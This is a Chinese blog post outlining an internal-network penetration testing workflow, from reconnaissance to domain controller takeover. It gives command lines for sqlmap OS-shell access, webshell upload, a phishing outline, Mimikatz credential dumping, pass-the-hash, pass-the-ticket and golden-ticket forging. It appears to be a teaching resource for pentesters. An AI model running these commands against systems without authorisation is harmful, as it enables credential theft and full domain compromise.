AI智能摘要
当你终于拿到内网入口,却卡在无法突破域控的瓶颈时,是否以为只要权限够高就能为所欲为?错。90% 的渗透测试死在“横向移动”这一环,盲目扫描只会暴露行踪。真正的破局点不在暴力破解,而在于精准利用 PtH 与 PtT 机制绕过身份验证,甚至通过黄金票据直接接管整个域。但这套操作对凭证的要求极其苛刻,一旦搞错哈希或 SID,不仅攻击失败,还会瞬间触发安全警报。你确定自己手中的工具链能完美复现那个让防御者防不胜防的瞬间吗?
— AI 生成的文章内容摘要
一、渗透测试流程概览
信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写
---
二、信息收集阶段
2.1 外网信息收集
# 子域名枚举 subfinder -d target.com -o subs.txt # 端口扫描 nmap -sS -sV -p- target.com # 目录扫描 dirsearch -u http://target.com -e php,html,js # 指纹识别 whatweb http://target.com
2.2 社工库查询
- 邮箱泄露查询:haveibeenpwned.com - 密码泄露查询:dehashed.com - 企业邮箱格式:theHarvester
---
三、初始访问
3.1 Web 漏洞利用
# 文件上传漏洞 # 上传 webshell 到 /uploads/shell.php # SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell # RCE 漏洞 # Struts2、WebLogic、Fastjson 等
3.2 钓鱼攻击
1. 伪造登录页面 2. 发送钓鱼邮件 3. 获取员工凭证 4. VPN 登录内网
---
四、权限提升
4.1 Windows 提权
# 检查系统信息 systeminfo whoami /priv # 检查补丁 wmic qfe list # 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula
4.2 linux 提权
# 检查内核版本 uname -a
# 检查 sudo 权限 sudo -l
# 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null
# 检查 cron 任务 cat /etc/crontab
---
五、横向移动
5.1 凭证窃取
# Mimikatz 抓取密码 mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords # 导出 hash mimikatz # lsadump::sam
5.2 传递攻击
# PtH(传递 hash) mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH # PtT(传递票据) mimikatz # kerberos::ptt admin.ccache
---
六、域控拿下
6.1 域信息收集
# 查看域信息 net domain nltest /domain_trusts # 查看域控 nltest /dclist:target.com # 查看域用户 net user /domain
6.2 黄金票据
# 获取 krbtgt hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt # 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx
---
七、报告编写
7.1 报告结构
1. 执行摘要 2. 漏洞列表(按风险等级) 3. 详细利用过程 4. 修复建议 5. 附录(工具、命令)
---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-04-14
安徽省蚌埠市 1F
这流程图看着就头大,PtH和PtT到底有啥区别啊?